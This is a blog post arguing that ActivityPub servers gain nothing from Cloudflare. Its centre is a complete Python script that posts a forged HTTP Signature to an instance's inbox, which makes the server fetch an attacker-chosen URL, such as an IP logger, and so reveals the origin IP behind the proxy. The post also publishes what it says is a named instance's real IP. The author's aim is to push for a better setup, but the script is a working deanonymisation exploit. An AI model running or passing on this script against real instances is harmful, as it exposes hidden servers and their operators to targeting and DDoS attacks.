Stop Using Cloudflare with ActivityPub

How 7 proxies can't help much when you don't know what you're doing

The seven proxies meme but he's frowning. The text has been replaced with WHY IS UNDER ATTACK MODE CAUSING MY SERVER TO BREAK WTF.

So, presume you have a VPN. You use this VPN to go around posting on piracy forums and such and keeping up with the latest leaks. Suddenly, one day, you get a cease and desist. But you had a VPN! What happened?

Well, what you didn't realize is that BitTorrent is a decentralized protocol where your client sends the IP to a tracker that lets people know where to send the data. (It's more complex than that, but just work with me here.)
The issue is your client didn't know you were behind a VPN and dutifully sent your home IP while you were getting that fresh leaked copy of Shrek 2, meaning people watching the torrent could see your IP too.

Thankfully, VPNs are for sending requests too, so this is an easy to solve problem!

But...

ActivityPub is a decentralized protocol that runs on a server and makes external requests.
Cloudflare is a protection service that assumes you will not be making external requests and only will be replying to requests.

Please, stop trying to combine them. As part of my plea, here's proof that this doesn't work and you should stop.

#!/usr/bin/python
# decloakap.py
import requests
import argparse

parser = argparse.ArgumentParser(description='Cause a GET request from a Activity-Pub compatible instance.')
parser.add_argument('instance', help="Hostname of the instance.")
parser.add_argument('url', help="URL to request.")
parser.add_argument('-d', '--debug', action='store_true', help="Enable debug output")
args = parser.parse_args()
if args.debug:
  # bunch of bullshit to enable requests logging
  import logging
  import http.client as http_client
  http_client.HTTPConnection.debuglevel = 1
  logging.basicConfig()
  logging.getLogger().setLevel(logging.DEBUG)
  requests_log = logging.getLogger("requests.packages.urllib3")
  requests_log.setLevel(logging.DEBUG)
  requests_log.propagate = True
  
if '://' not in args.instance:
  inbox = f"https://{args.instance}/inbox"
else: 
  inbox = f"{args.instance}/inbox"
  
header = 'keyId="%s",headers="(request-target) host",signature="aA=="' % (args.url)

p = requests.post(inbox, data = "{}", headers = {"Signature": header, "User-Agent": "http.rb/3.3.0 ()"})
print(p.text)
if "Public key not found" in p.text: 
  print("[!] (Public key not found usually means it worked, check your logs)")
elif p.status_code == 500: 
  print("[!] (500 occurred, if Pleroma, check logs!)")
else: 
  print("[?] Not sure what this is, but check logs anyway lol")

This script will automatically pass a lousy, really effortless request to an instance that makes it dutifully request whatever you ask of it. Including IP loggers, which are a dime a dozen, meaning I can get your instance's IP anyway. For example, Spinster is at 167.71.191.94.

Now that I have sufficiently proven that any reverse proxy without an actual proxy is useless, what can you do about it?

Don't use Cloudflare

Seriously, Cloudflare blocks automated requests.
The way ActivityPub works is automated requests.

Please stop using CloudFlare. If you want an anti-DDoS solution, get an anti-DDoS server host.

Thank you.